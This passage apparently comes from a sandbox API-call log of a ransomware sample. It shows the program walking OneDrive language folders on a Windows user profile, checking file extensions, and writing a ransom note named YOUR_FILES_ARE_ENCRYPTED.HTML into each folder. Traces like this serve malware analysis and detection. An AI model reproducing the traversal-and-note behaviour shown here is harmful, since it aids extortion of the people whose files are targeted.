param_2="%02X" | out: param_1="BC") returned 2 [0113.082] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="87") returned 2 [0113.082] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="CF") returned 2 [0113.082] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="9A") returned 2 [0113.082] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="DE") returned 2 [0113.082] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="84") returned 2 [0113.082] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="3B") returned 2 [0113.083] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll" [0113.083] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.083] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.083] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cf8febe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5cf8febe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5cf8febe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mt-mt", cAlternateFileName="")) returned 1 [0113.083] StrStrIW (lpFirst="mt-mt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.083] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt") returned 81 [0113.083] GetProcessHeap () returned 0x600000 [0113.083] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.083] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt" [0113.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt\\*" [0113.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cf8febe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5cf8febe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d349bc1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.085] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cf8febe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5cf8febe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d349bc1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.085] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d349bc1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d349bc1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d51389a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.085] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.085] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.085] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.085] lstrlenW (lpString=".mui") returned 4 [0113.085] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.085] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d349bc1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d349bc1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d51389a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.085] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.085] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.085] GetProcessHeap () returned 0x600000 [0113.085] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\mt-mt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.086] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.087] CloseHandle (hObject=0x324) returned 1 [0113.087] GetProcessHeap () returned 0x600000 [0113.087] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.087] GetProcessHeap () returned 0x600000 [0113.087] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.088] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d5ac1b2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d5ac1b2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d5ac1b2, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nb-no", cAlternateFileName="")) returned 1 [0113.089] StrStrIW (lpFirst="nb-no", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.089] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no") returned 81 [0113.089] GetProcessHeap () returned 0x600000 [0113.089] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.090] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no" [0113.090] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no\\*" [0113.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d5ac1b2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d5ac1b2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d80e6a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.091] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d5ac1b2, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d5ac1b2, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d80e6a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.092] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d80e6a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d80e6a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.092] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.092] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.092] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.092] lstrlenW (lpString=".mui") returned 4 [0113.092] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.092] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d80e6a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d80e6a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.092] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.092] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.092] GetProcessHeap () returned 0x600000 [0113.092] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.093] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.094] CloseHandle (hObject=0x324) returned 1 [0113.094] GetProcessHeap () returned 0x600000 [0113.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.094] GetProcessHeap () returned 0x600000 [0113.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.094] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd6ba86, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd6ba86, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd6ba86, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ne-np", cAlternateFileName="")) returned 1 [0113.094] StrStrIW (lpFirst="ne-np", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.094] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np") returned 81 [0113.094] GetProcessHeap () returned 0x600000 [0113.094] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.094] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np" [0113.094] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np\\*" [0113.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd6ba86, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd6ba86, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dfa7ed7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.095] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd6ba86, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd6ba86, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dfa7ed7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.095] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dfa7ed7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dfa7ed7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e197eee, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.095] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.095] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.095] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.095] lstrlenW (lpString=".mui") returned 4 [0113.095] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.095] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dfa7ed7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dfa7ed7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e197eee, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.095] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.095] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.095] GetProcessHeap () returned 0x600000 [0113.095] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ne-np\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.098] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.099] CloseHandle (hObject=0x32c) returned 1 [0113.099] GetProcessHeap () returned 0x600000 [0113.099] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.099] GetProcessHeap () returned 0x600000 [0113.099] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.100] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e23074d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e23074d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e23074d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nl", cAlternateFileName="")) returned 1 [0113.100] StrStrIW (lpFirst="nl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.100] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl") returned 78 [0113.100] GetProcessHeap () returned 0x600000 [0113.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.101] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl" [0113.101] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl\\*" [0113.101] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e23074d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e23074d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e492cdf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.102] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e23074d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e23074d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e492cdf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.102] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e492cdf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e492cdf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e7da121, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.102] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.102] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.102] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.102] lstrlenW (lpString=".mui") returned 4 [0113.102] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.102] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e492cdf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e492cdf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e7da121, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.102] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.102] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: 